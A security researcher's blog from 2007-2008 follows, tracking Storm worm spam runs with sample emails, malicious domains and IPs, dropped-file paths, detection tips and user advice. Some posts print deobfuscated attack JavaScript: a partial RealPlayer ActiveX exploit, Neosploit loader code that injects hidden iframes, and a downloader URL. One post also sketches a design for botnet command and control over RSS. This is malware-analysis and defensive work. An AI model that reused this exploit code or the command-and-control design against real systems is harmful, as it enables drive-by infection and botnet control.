Friday, July 04, 2008

Storm - Fourth of July run

Stormworm (aka CME711/Peed/Peacomm) has recently modified its spam run to play on US Independence Day, July 4th.

The site offers fireworks.exe and forces a binary download using malicious JavaScript. Users should be cautioned to watch for pages that look similar to this:




Instead of the typical "you need to download the codec to play this video", the Storm authors have decided to show some pretty colors on the screen, which may actually trick more users into downloading the malicious file. Hopefully many people in the US will be watching the real fireworks displays and this run will fizzle out.

An example email:

Received: from [133.230.190.105] (helo=ngr)
by izqfx with smtp (Exim 4.62 (FreeBSD))
id 1KEaiJ-0005Pc-6y; Fri, 4 Jul 2008 09:07:55 +0700
Message-ID: <486d8556.6010007@libertytax.com>
Date: Fri, 4 Jul 2008 09:05:10 +0700
From:
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: [redacted]
Subject: Celebrate the spirit of America
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Celebrations have already begun http://68[dot]72[dot]110[dot]46/

(The dots in the URL have been replaced with [dot] to protect against accidental clicks.)

Fireworks.exe drops the peers list in C:\WINDOWS\msserv.config and the binary in C:\WINDOWS\msserv.exe. It also sets the NTP server to time.windows.com and time.nist.gov. If you use another time server and suspect an infection, check the NTP server setting under HKLM\System\CurrentControlSet\Services\W32Time\Parameters.

Additional information can be found at http://garwarner.blogspot.com/2008/07/storm-worm-salutes-our-nation-on-4th.html

Thursday, June 19, 2008

CME711's latest SE Spam



The Stormworm operators have recently updated their spam and web content. The webpage (capture to the right) is shown in its entirety. Users are then given the opportunity to download and run a malicious file, beijing.exe.

For the last couple of months the Storm domains have been less fast-fluxy: they change every 60 seconds instead of with every request. Perhaps this is because they are simply too small, or perhaps it's because too many people are hitting the DNS servers, causing a denial of service.

Regardless, we've spotted the following domains in use:

biztech-co.cn, ratedhot.cn, fconnorlaw.cn, pacoast.cn, cadeaux-avenue.cn, likenewvideos.com, tellicolakerealty.cn, activeware.cn, grupogaleria.cn and polkerdesign.cn.


Please update your IDS accordingly.

Tuesday, April 01, 2008

CME711 - April Fools

I'm a bit late posting this one - I've been working on some penetration testing projects and have been unable to monitor my honeypots.

For those who have not yet noticed:

(image captured by DISOG staff on 2008/03/31)

The 5-second refresh downloads funny.exe, clicking the image downloads kickme.exe, and the 'click here' link downloads foolsday.exe; all three are the same file.


The email:

From: sauna@piraeusbank.co.yu
To: Me
Subject: Gotcha! April Fool!
Date: Mon, 31 Mar 2008
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

Doh! April's Fool. hxxp://69[dot]237[dot]180[dot]107


(obscuring done to protect the click-happy)

It drops a file called aromis.exe in C:\WINDOWS\.

Jose Nazario caught this one early on - check out his blog here.


I ran a quick query on my honeypot and found the following IPs serving the malicious site:


Monday, March 03, 2008

CME711 - It's a howl!

Storm/CME711 is back to a 'funny greeting card' page.


(Note the "copyright error" in the image)

  • The file postcard.exe is offered by clicking on the image.
  • The file ecard.exe is offered when waiting 5 seconds.
  • The file e-card.exe is offered when clicking the 'click here' link.

Many people already watch for *card.exe with their IDS. I don't expect this to last long. Perhaps the next will be related to the anticipated U.S. Economic Stimulus Package --- or maybe Easter?

It appears this latest run drops the peers list to c:\windows\system32\diperto.ini.

A few MD5's for the binaries are:

Saturday, February 23, 2008

Welcome to my homepage - CME711's latest run.

While checking my Stormworm/CME711/Peed/Peacomm/Zhelatin honeypot I noticed a recent page in German - which was roughly translated to English using an online translation utility:

Patrick homepage
Hello everyone!
Welcome to my home page

Short about me:

I have thought a lot, and now decided that normal relations with the woman I am with is not acceptable.
I am gay. My new life has changed a lot. I found a friend. The new sensation was the top and I do not
remember when I last felt so well. With my friend I spent the whole day, but then our love came to an end.

Now, I have only the soul of pain and memories. And now I will again find someone that I like,
with whom I spend my time and have sex too. The photo is a half year old (link:/album/IMG9481.exe)

I am unable to retrieve the binary - it appears the CME711 author(s) are still tweaking the page. The border of the page is an image, p.jpg. As soon as they finish updating I will post more details and a screen shot.

I suppose this could be loosely linked to the ED spam everyone is seeing in their email.

Sunday, February 03, 2008

Botnet Distributed Command and Control (DC&C)

Over the past four years we've seen a large number of law enforcement, ISPs, and hobbyists get involved with botnet monitoring. A side effect of the increased interest is that botnet operators will go to great lengths to keep their botnets hidden. That includes encryption, hiding in plain sight, use of undocumented/new protocols and distributed control structures. As law enforcement arrests more offenders, we see more of them using TOR, or their own botnets to hide their true identity. While I personally don't feel it will ever be the super-bug theory that Paul Vixie and Gadi Evron imagine, it is a concern we need to be aware of.

The following post may help drive some botnet operators deeper underground, but the concepts are not new. In many cases these concepts are in use today. I presented on these topics a year ago at the 5th Botnet Task Force conference. For a year security researchers and law enforcement have had the chance to reflect on my presentation and develop mitigation.

Distributed Command and Control is simply a term we use for botnets where the operator has learned that directly controlling a large botnet is a big risk to himself and his network. Large-scale botnets still exist today; however, operators are wisely breaking these networks up into many smaller networks, or using peer-to-peer communication. Since the networks are spread out, it's harder to eliminate the threat of one attacker.

For example, if a botnet operator takes his 50,000 bots, and spreads them out into 10 networks, each net could have 5,000 drones. By spreading his network out, he mitigates some of the threat from rival operators, botnet hunters, ISPs, and law enforcement. Even if one controller node was taken offline, the botnet operator has 45,000 bots to retaliate with. In many circumstances this gives an operator the heads up he needs to update his 45,000 other bots and protect his empire.

As recently as two years ago, we started seeing botnets using a pyramid structure, like the simplified image below.



A botnet operator is represented at the top of this flow chart. He communicates with a smaller botnet of only a couple dozen drones. Those drones then communicate with many larger botnets, which perform the stated action. This provides the botnet operator a layer of protection: now experienced researchers or law enforcement must find the smaller net to identify the botnet operator. This is time-consuming work, and without the cooperation of ISPs it's hard work. Even if a controller node is found, it is much easier to snoop on a net with 5,000-10,000 drones than on one with fewer than 100 drones.

This distributed structure also helps if the botnet operator wants to rent out or sell portions of his botnet. One chunk can be used for spam, while another may perform better in denial-of-service activities.

Another example of a distributed structure is the P2P scenario, where the botnet operator issues a command which is passed to a number of supernodes, which then pass it on to the individual peers.

Mapping peer-to-peer and other types of DC&C is still possible. It was done with Stormworm and will continue to be done with future P2P botnets. I won't highlight how researchers are doing this mapping, simply because we need to weigh teaching the public (including bad guys) against keeping an ace up our sleeves. I'm hoping this post will spark many closed-door conversations to help investigate other methods for tracking and identifying.

As part of the BTF presentation I gave, I wanted to outline additional C&C vectors that could be used. The idea that really caught my eye was based on hiding in plain sight: using protocols that are commonly used by millions of users every day. CME711 (Stormworm) has been easy to keep on top of because of the mistakes they make in maintaining their DNS (fast flux), registering their domains and using UDP P2P traffic. Because of that UDP P2P traffic many large corporations have been immune: they block outbound UDP.

The number of infected machines would increase dramatically if they used a connection model similar to Skype.

So, back to hiding in plain sight: what would you say to a bot that received its commands over RSS? News readers use RSS to gather headlines and a few lines of news. Users are able to quickly choose articles that interest them while ignoring those that do not. Millions of people subscribe to RSS feeds, and many of those feeds are of blog or comment pages. Many news sites allow comments on their website, which can then be retrieved via RSS. Since RSS is simply HTTP requests wrapped in a pretty new interface (XML), bots could easily parse this data to receive commands. An anonymous poster could post a command, and bots could be scheduled to pull the feed every 10-15 minutes. The requests would look like legitimate RSS traffic, and it would be hard to tell which visitors were bots and which were legitimate.

Using a form of encryption the botnet operator could even protect his botnet so others were unable to issue commands. High profile news and blogging sites might not be so helpful with requests to disable portions of their website because a botnet used it as a command and control vector. They might be more willing to assist law enforcement though, certainly more willing than some ISP's.
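
As an added illustration, not from the original post, the detection side of this idea: a scheduled feed poll leaves a very regular request rhythm in proxy logs, while a person reading the same feed does not. The log format, the client addresses and the news.example site below are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

# Constructed proxy log lines (not from the post): timestamp, client, method, URL.
# 192.0.2.10 fetches the comment feed every ~10 minutes with a few seconds of jitter;
# 192.0.2.20 is a person reading the same site at irregular times.
SAMPLE_LOG = """\
2008-02-03T10:00:00 192.0.2.10 GET http://news.example/comments.rss
2008-02-03T10:01:12 192.0.2.20 GET http://news.example/comments.rss
2008-02-03T10:10:03 192.0.2.10 GET http://news.example/comments.rss
2008-02-03T10:19:58 192.0.2.10 GET http://news.example/comments.rss
2008-02-03T10:27:40 192.0.2.20 GET http://news.example/story/42
2008-02-03T10:30:05 192.0.2.10 GET http://news.example/comments.rss
2008-02-03T10:40:01 192.0.2.10 GET http://news.example/comments.rss
2008-02-03T10:49:57 192.0.2.10 GET http://news.example/comments.rss
2008-02-03T11:00:02 192.0.2.10 GET http://news.example/comments.rss
2008-02-03T11:05:30 192.0.2.20 GET http://news.example/comments.rss
2008-02-03T12:48:11 192.0.2.20 GET http://news.example/comments.rss
2008-02-03T13:02:45 192.0.2.20 GET http://news.example/comments.rss
"""


def parse_log(text):
    """Return {(client, url): [timestamps]} from the constructed log format."""
    hits = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split()
        hits[(client, url)].append(datetime.fromisoformat(ts))
    return hits


def find_periodic_pollers(text, min_requests=5, min_period=300,
                          max_period=1800, max_cv=0.05):
    """Flag (client, url) pairs whose fetch intervals are regular enough to look scheduled.

    cv is the coefficient of variation (stddev / mean) of the gaps between
    requests: a timer firing every 10-15 minutes gives a cv close to 0, while a
    person opening a feed reader whenever they feel like it does not. The
    period window keeps one-off bursts and hourly crawlers out of the result.
    """
    flagged = []
    for (client, url), times in parse_log(text).items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = median(gaps)
        cv = pstdev(gaps) / mean(gaps)
        if min_period <= period <= max_period and cv <= max_cv:
            flagged.append({"client": client, "url": url,
                            "period_s": period, "cv": round(cv, 4)})
    return flagged


if __name__ == "__main__":
    for hit in find_periodic_pollers(SAMPLE_LOG):
        print("%(client)s polls %(url)s every %(period_s).0fs (cv=%(cv)s)" % hit)
```

The thresholds are starting points; on a real proxy log you would tune min_requests and max_cv against your own feed readers before treating a hit as anything more than a lead.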

So how do users protect themselves, and the rest of the internet community?

First, users should use common sense. Don't click links in email or instant messenger! If the email contains a link, use the cut and paste function to visit URLs. If you're offered a picture or video in instant messenger, verify the sender sent the file and only then use your best judgment before proceeding.

Don't download untrusted software. Even if it's recommended by your neighborhood computer genius (high school student), do research with an internet search engine. What do others say about it?

Don't surf as an administrator. Even if you do pick up a piece of malware, if you're logged in with limited privileges you will be less likely to install harmful malware.

Online banking should be done from a secure location. Do not access your bank account from hotspots like coffee shops or restaurants. Avoid doing so from work as well - remember in the United States you have no right to privacy on your corporate PC, which likely means your boss is watching where you surf. He or she might just be using a keystroke logger.

Never give your personal information on the internet. Your bank will not notify you of account problems via email - and in the event that changes over the next few years, bank pages are usually encrypted. Watch for "https://" at the beginning of your URL bar. Watch for the padlock icon on most browsers. If you're presented with an expired or self-signed certificate, cancel the connection and notify the webmaster immediately.

Consider using a Sandboxer for programs that access the internet. SandboxIE is a great piece of software that will wrap around web browsers, email clients, instant messengers, just about any application that accesses the internet. It uses temporary user space to protect you from hostile code.

Don't consider "known" sites trusted. No site is ever trusted. Sites are compromised every day. Many times these compromises point to code that will attempt to compromise your PC.

If possible, disable Javascript for sites you casually visit. Using the NoScript Firefox plugin is an excellent idea for most users. This is becoming increasingly harder as poor coders are hired to develop websites.

Use firewalls at both the router and operating system level.

Turn your PC off when not in use. Even if your machine is infected, the damage it can do is limited to the time you spend on your system. Most users are on their home computer for only a few hours a day.

Keep your Antivirus definitions and application patches up to date. Remember many third party applications will not update every month like your operating system. You should do this manually or work with the vendor to schedule updates.

Alternative operating systems are no excuse for poor security practices. Linux has malware, OS X has malware, BSD has malware. Keep your security hat on even if you don't run the targeted OS of the month.

Report suspected botnet activity and spam. CastleCops and Shadowserver have excellent resources available to help report malicious activity. DISOG staff always welcomes submissions via email (staff [-at-] disog.org).

Tuesday, January 15, 2008

CME711: Happy Valentines Day and Halifax phish

The CME711 gang has changed their tactics again. We've started seeing emails in our mail drops with pointers to nodes serving "withlove.exe" and "with_love.exe".

So far they have reverted to sending IPs in the email body, which makes it easy for most spam filters to catch.

The website code looks the same as in previous runs, with false binaries in comments and the greeting:

Your download should begin shortly. If your download does not start
in 10-20 seconds, you can click here to launch the download
and then press Run


The link is a javascript: document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );

That JavaScript translates to withlove.exe. Additionally, there is an image of a pink heart on the page that links to with_love.exe. You may wish to update your Snort signatures.
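
As an added example (not part of the original post), a small decoder that expands the %XX-escaped argument of that document.write(unescape(...)) call and pulls the link target out of the result. The escaped string is the one quoted above; js_unescape also handles %uXXXX sequences, which plain URL decoding does not.

```python
import re

# Escaped string exactly as it appears in the Storm Valentine page quoted in the post.
ESCAPED_LINK = ('%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65'
                '%2E%65%78%65%22%3E%0D%0A')

# JavaScript unescape() understands %XX and %uXXXX; '+' is not a space and
# anything that is not a valid sequence is passed through untouched.
_ESCAPE_RE = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')


def js_unescape(s):
    """Decode a string the way the JavaScript unescape() function does."""
    def repl(m):
        hex_digits = m.group(1) or m.group(2)
        return chr(int(hex_digits, 16))
    return _ESCAPE_RE.sub(repl, s)


def decode_document_write(snippet):
    """Extract and decode the literal inside document.write(unescape('...')).

    Returns '' when the snippet is not of that shape, so callers can tell
    "nothing to decode" apart from an empty payload.
    """
    m = re.search(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", snippet)
    return js_unescape(m.group(1)) if m else ''


def extract_hrefs(html):
    """Return every href target in a decoded fragment (what the page really links to)."""
    return re.findall(r'href\s*=\s*["\']([^"\']+)["\']', html, flags=re.I)


if __name__ == '__main__':
    snippet = "document.write( unescape( '%s' ) );" % ESCAPED_LINK
    html = decode_document_write(snippet)
    print(repr(html))
    print(extract_hrefs(html))
```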

Additionally, we're tracking a phish using Stormworm fast-flux nodes with the domain ibank-halifax.com.

Thursday, January 10, 2008

CME711 Domains offline.

Steven Adair with Shadowserver is reporting that all the Stormworm domains have been marked NOT DELEGATED.

Randy V also performed some checks today and found the same thing. We're keeping a close eye on our honeypot to see if they change domains or if this is simply a smoke screen.

The authors were probably finished with the domains anyway, since it's well past the new year. The DISOG team is placing bets on the next ruse. I say adult-rated material for February 14th (St. Valentine's Day).

Domains that have been flagged and appear to be disabled:

i-halifax.com, i-barclays.com, newyearcards2008.com, happycards2008.com, uhavepostcard.com, merrychristmasdude.com, newyearwithlove.com, familypostcards2008.com, freshcards2008.com, hellosanta2008.com, happy2008toyou.com, happysantacards.com, hohoho2008.com, santawishes2008.com, santapcards.com, postcards-2008.com, parentscards.com

Wednesday, December 26, 2007

Bah, Storm.

I'd like to thank everyone who wrote in with the updates, CME711 is now using a Happy New Year theme. I would have posted earlier, but I promised the family a full day of Non-Digital happiness and it was truly a white Christmas.

Nothing sexy about this latest run, pretty crappy workmanship. It was an obvious afterthought. It probably pissed off the botrunner that so many people were able to catch on to his Naughty Santa theme, so he produced a text-only front page:
Happy New Year!

Your download should begin shortly. If your download does not start in approximately 15 seconds, you can (happy2008.exe) click here to launch the download and then press Run. Enjoy!
Hardly worth a post, except to exclaim how pathetic it looks. Certainly not the experience we've seen from these guys in exploits past. The domain was even registered December 23rd, such poor planning. Not an encoded javascript in sight. I wonder how much money these guys are paying their graphic designers. Certainly more than they're making. Even second rate script rats should think twice before getting in bed with these goons - they're too famous.

So, the domain? uhavepostcard.com. (also happycards2008.com)
Are the others still resolving? Yup.
Which binaries still work? stripshow.exe sony.exe happy2008.exe (update: happy-2008.exe)
Should the offenders be strung up by their toes and fed spoiled eggnog for 30 days? ;)

I sincerely hope that everyone else had a wonderful holiday, and for my New Years wish, I'd like a picture of the CME711 weenies drinking well expired eggnog. I'd also settle for another wonderful day with the family, as it was today.

Monday, December 24, 2007

Stormworm is back. - Have a Merry Christmas Dude, Mrs. Claus is kinky!


We just received a handful of these in our mail drops. Looks like the grinch still runs Storm.

Received: from odv ([129.65.118.202])
by dxmbg (8.13.4/8.13.4) with SMTP id lBO3q3Xg061735;
Sun, 23 Dec 2007 19:52:03 -0800
Message-ID: <002601c845e0$2b459370$ca764181@odv>
From: jyothi@acc.aon.com
To: Nicholas
Subject: Santa Said, HO HO HO
Date: Sun, 23 Dec 2007 19:50:48 -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

hey,

I know you hate these kind of emails but this one is different. This
will be the best 2 min you spend this holiday. hehe
http:// merry christmas dude . com/

Which plays a happy little Christmas tune, offers stripshow.exe and visits this Neosploit:
http:// merrychristmasdude .com/ cgi-bin/ in.cgi?p=100

In place of MerryChristmasDude you could use ltbrew, tibeam, etc.

JSDecode (See previous post) has no issues with this javascript, and cleans it up to show:

var script = document.createElement("script");

script.setAttribute("language", "JavaScript");
script.setAttribute("src", "?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i");

document.body.appendChild(script);


So we look at cgi-bin/in.cgi?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i...

It took two passes, but JSDecode did its job:

....snip...
function startANI() {
    var ifr = document.createElement("div");
    document.body.appendChild(ifr);
    ifr.innerHTML = '<iframe src="?o2&p=595022058&r=2792316769" height="1" width="1"></iframe>';
    return 0;
}

if (startMDAC() || makeSlide() || startQuickTime() || startSuperBuddy() || startAudioFile() || startGOM() || startWVF() || startANI()) { }
setTimeout("window.location = 'http://www.google.com'", 5000);
...snip...

The ANI looks fun:
From:
Subject:
Date: Thu, 20 Dec 2007 08:57:57 -0800
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0005_01C842E6.6AA3A540"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://testtest/index.html

------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Location: http://testtest/1.dat
....
[BASE64 ENCODED FILE - infected: Exploit.Win32.MS05-002.Gen]


Once run in the sandbox, %windir%/disnisa.exe is the binary and %windir%/disnisa.config holds the peer list.

Same old storm, binary changes every few seconds, and someone's going to fall for it.

Complete binary analysis can be found at ASERT (Arbor Networks, Jose Nazario)

Wednesday, December 05, 2007

QuickTime and RealPlayer Exploits

We're seeing lots of reports about QuickTime and RealPlayer exploits in the wild. Other security vendors are privately reporting in excess of 300 sites infected with these exploits. Most of them are iframes pointing to encoded JavaScript. Of course, users may never even know they've been infected.

Here is a partial snip of one exploit in human readable form:

function RealExploit()
{
    var user = navigator.userAgent.toLowerCase();
    if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
        return;
    if(user.indexOf("nt 5.")==-1)
        return;
    VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
    try
    {
        Real = new ActiveXObject(VulObject);
    }catch(error)
    {
        return;
    }
    RealVersion = Real.PlayerProperty("PRODUCTVERSION");
    Padding = "";
    JmpOver = unescape("%75%06%74%04");
    for(i=0;i<32*148;i++)
        Padding += "S";
    if(RealVersion.indexOf("6.0.14.") == -1)
    {
        if(navigator.userLanguage.toLowerCase() == "zh-cn")
            ret = unescape("%7f%a5%60");
        else if(navigator.userLanguage.toLowerCase() == "en-us")
            ret = unescape("%4f%71%a4%60");
        else
            return;
    }
    else if(RealVersion == "6.0.14.544")
        ret = unescape("%63%11%08%60");

    .....

    (removed some content)
    .....
    PayLoad = Padding + AdjESP + Shell;
    while(PayLoad.length < 0x8000)
        PayLoad += "copyleft";
    Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();

Many people forget to upgrade their third-party applications. Please remember to apply all security patches for those as frequently as (or more frequently than) Windows updates.
In other news,

Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.

A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.

Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...

Happy Holidays!

Wednesday, November 07, 2007

New style, same old exploits

The witches and goblins of storm have not finished their Halloween wrath.

At about 1300 hrs, UTC on November 7th, the xor’d mpack javascript was replaced with an iframe:

<iframe src="http://removed.for.your.protection/cgi-bin/in.cgi?p=user1" height="0" width="0"></iframe>

This iframe redirects you to some heavily layered javascript. After peeling back the layers, the finished product looks like this:

…snip…
function startMDAC() {
    var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
    var v = new Array(null, null, null);
    var i = 0;
    var n = 0;
    var ret = 0;
    var urlRealExe = 'http://removed.for.your.protection/cgi-bin/in.cgi?u2_1_600_2_0_870665223_2792316769_2354152789';
}
…snip…

The link in the urlRealExe variable is formally known as file.php. It is a downloader which grabs sony.exe and connects to the network.

There has been no change in the social engineering vectors, but the attempt to hide their exploit in layered JavaScript is new and might confuse antivirus.

Update: The servers are now responding with 500 (Internal Server Errors) when trying to access the /cgi-bin/in.cgi file.

Update 2: The new filename is dancer.exe. The email body provided to me has the word 'plain' incorrectly spelled as plane.

Saturday, October 20, 2007

Detecting CME711 (Storm)

For those of you just joining us...

The trojan known as CME711 by Mitre, or Peacomm, Peed, Storm, and Nuwar, infects machines using social engineering. A user will receive an email with a half dozen or less lines of text. The email suggests the user will receive a greeting card, free game, or music sharing software. Other social engineering spams attributed to Storm have been placed on blogs and webpages.

More often than not, unsuspecting users will click the link provided in these emails or blogs. For those who are unlucky enough to have not applied patches to their operating system or third-party software, the authors of this trojan have left a special treat: a JavaScript ripped from the Mpack suite.

When an unpatched user visits an Mpack infected site, they are infected with a host of malware. No user interaction is required for infection.

For those who have applied all patches, the authors have created a professional looking webpage that may spark your interest and have you clicking links. Either way, the end result is an infection, and your PC is turned into a zombie for the Storm botnet.

The botnet communicates using the same peer to peer technology as many file sharing applications like Gnutella and EDonkey. Since it uses this technology, it is hard to determine where botnet commands originate or how many zombies are a part of this botnet. Due to the peer to peer structure, locating the person controlling this network is very difficult. Worse still, the commands issued by the botnet controller are encrypted. The network uses DNS Double FastFlux to keep researchers from shutting the malware distribution points. Over 40,000 unique IP addresses have been seen by DISOG in the last 6 months serving malicious code for Storm. The Storm botnet is truly a global pest.

Many people have written in and asked for quick ways to detect if they are infected with Storm. This is difficult because Storm uses rootkit technology; to add to the misery, the code morphs every 30 to 60 seconds, which means you are unlikely to infect yourself with the same piece of code twice.

I've tested a few of the freely available rootkit detectors, and have come up with this pattern for tests:

Install rootkit detector -> run test -> reboot -> run test again.

Sophos rootkit detector and gmer both detected the hidden files after reboot, but neither detected on the first test.

Many people are reluctant to install another piece of software and I can understand why, so I decided to test the current version of Storm's file hiding technology. What I found is that you're able to determine if you've been infected by creating one file, and then trying to list that file using the dos directory (dir) command. You are also able to do this from the GUI, however the results are a little less obvious.

For this test, click start->run and type "cmd" (without quotes). A Command Prompt window will appear. Next you will want to create a file called spooldr.test. Do so by typing 'copy con spooldr.test'. Nothing will appear to happen, you will just be pushed to a blank line below your copy con command. Type something random and press enter. Then press the F6 key. You will see ^Z and '1 file(s) copied.' then you will be returned to your command prompt (C:\Documents and Settings\whatever\>) again. What you've just done is created a file with whatever text you typed on the blank line, just like if you created a new file in notepad and saved it.

Type 'dir spooldr.test'. If you're able to see the file with the current date and time, you're not infected with this version of Storm. If you can't list this file, you're probably infected, and need to seek professional help for removal.

It is trivial for the Storm authors to change their tactics and use another pattern for hiding their files. (SEE UPDATE BELOW!) I will try to keep on top of any changes and post them here - for now this should work on most systems. I could have written a program to do this for you and I am sure someone else will. However I believe in education, and you just can't learn anything if someone does all the work for you.

My first test was to run the most recent version of Storm as a normal, unprivileged user. The bot did make contact with the Storm network, but the rootkit function did not work, and I was able to see the spooldr.cfg file, which contains the current list of peers assigned to my computer. Upon reboot the software did not restart, so my machine no longer participated in the botnet. Running the code as administrator was when it became dangerous. Security experts have long recommended using a non-privileged account for normal operations and only logging in as administrator when absolutely necessary. As if you needed another reason, right?

UPDATE:

McAfee is reporting that the filenames have changed from spooldr.* to noskrnl.*. They also reminded us that wincom.* was used towards the beginning of the year. It's doubtful they changed the name based on this blog post; more likely it was just good timing. I just grabbed a new binary and it's still using spooldr.* - to be safe, try all three files.
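The copy con / dir procedure above, scripted for all three filename patterns the update mentions. This is an added example, not code from the original post: it writes a probe file for each name into a directory, checks whether a plain directory listing still shows it, and removes the probe afterwards. The ".test" suffix follows the post; the helper names are my own.

```python
import os
import tempfile

# Probe names from the post: spooldr.* is current, noskrnl.* and wincom.*
# were reported by McAfee. A file-hiding rootkit filters on the prefix.
TEST_NAMES = ["spooldr.test", "noskrnl.test", "wincom.test"]


def probe_hidden_files(directory, names=TEST_NAMES):
    """Create each probe file in `directory` and check whether a normal
    directory listing (the equivalent of 'dir') still shows it.

    Returns a dict name -> True if the file is listed (expected on a clean
    system) or False if the listing omits it, which is what a file-hiding
    rootkit produces. Probe files are removed afterwards.
    """
    results = {}
    for name in names:
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write("disog probe\n")  # any content, as with 'copy con'
        try:
            # os.listdir enumerates the directory the same way 'dir' does;
            # a rootkit that filters enumeration will drop the name here.
            results[name] = name in os.listdir(directory)
        finally:
            try:
                os.remove(path)
            except OSError:
                pass  # a hidden file may also refuse deletion; leave it
    return results


def suspicious(results):
    """Return the probe names that were not visible in the listing."""
    return [name for name, visible in results.items() if not visible]


def probe_in_tempdir():
    """Run the probe in a fresh temporary directory and clean up."""
    with tempfile.TemporaryDirectory() as tmp:
        return probe_hidden_files(tmp)


if __name__ == "__main__":
    # Use the current directory, as the post does.
    res = probe_hidden_files(os.getcwd())
    for name, visible in res.items():
        print(f"{name}: {'visible' if visible else 'HIDDEN'}")
    if suspicious(res):
        print("Probe files were hidden from the listing; investigate further.")
    else:
        print("All probe files visible; this hiding pattern was not observed.")
```

Run it from the same account you normally use; as the post notes, the hiding only takes effect when the bot was run with administrator rights, so a clean result from an unprivileged probe is only evidence about that account's view of the filesystem.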


Thursday, October 18, 2007

MP3 Pump and Dumps -- UPDATED

Private security lists are buzzing that the latest Storm (CME711) pump and dumps are coming as MP3 audio attachments. Our mail drops have not received any of these yet, because our mail servers drop those attachments.

I've removed that restriction and hope to capture some samples soon. I've heard a sample and was barely able to understand the audio, though it is in English. I do not have permission to share that sample, so I will not be posting it here.

If you have a sample you'd like to share with the other readers, please send it as a zip attachment to security at disog dot org and let us know if we can attribute it to you.


Thanks for the submissions!

From an anonymous administrator

From Brent Eads


Wednesday, October 17, 2007

Let's get this party 'krackin!


The storm update has finally come, with the most recent page offering the latest in peer to peer sharing technology.
The page advertises a p2p application called Krakin, which, among other things, is said to be:

Easy to install, prevents tracking, has blogs and chat platforms, and video mail.

The download link points to krakin.exe, which is a p2p client - a p2p botnet client. The page isn't lacking the MPACK javascript either. I expect this page will stick around awhile. It looks very professional. I expect the blogger spam will pick up with this run.


Tuesday, October 16, 2007

0.0.0.0 - UPDATED.

Once again, CME711's domain resolvers are all pointing to 0.0.0.0 - which suggests another change is upon us.

What will it be this time? Baseball? My home team has just swept the Diamondbacks and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!

---

Update from Randy V:
They are back in full force. A nearly complete turn over of the active list from yesterday:
190.128.76.140 200.127.196.112 201.235.46.246 24.126.26.18 67.190.138.189 68.113.78.23 68.57.236.13 68.76.98.212 69.230.199.160 70.243.202.40 70.244.102.159 74.139.41.221 76.100.35.250 76.226.146.196 76.73.135.17 85.187.86.249 88.74.161.197
and the currently active list:
209.102.175.61 219.115.223.181 24.178.197.7 24.178.99.202 24.210.99.223 24.235.140.159 61.84.67.116 67.64.104.4 68.76.98.212 69.151.234.219 71.79.181.218 72.128.41.234 72.128.61.29 72.160.184.227 74.140.168.34 76.216.62.73 76.226.146.196 76.99.89.48 77.197.44.76 84.174.112.145 84.42.164.6 89.112.20.242 98.195.153.198 98.197.63.176
Only 201.235.46.246, 68.76.98.212 and 76.226.146.196 are in common. 76.226.146.196 is probably only a proxy.

Baseball does sound like a ripe target. There has not been a page change yet.

Update 2 (from Nicholas):
OpenDNS is null routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your domain servers to 208.67.222.222 and 208.67.220.220. For more information visit the OpenDNS website.


Friday, October 12, 2007

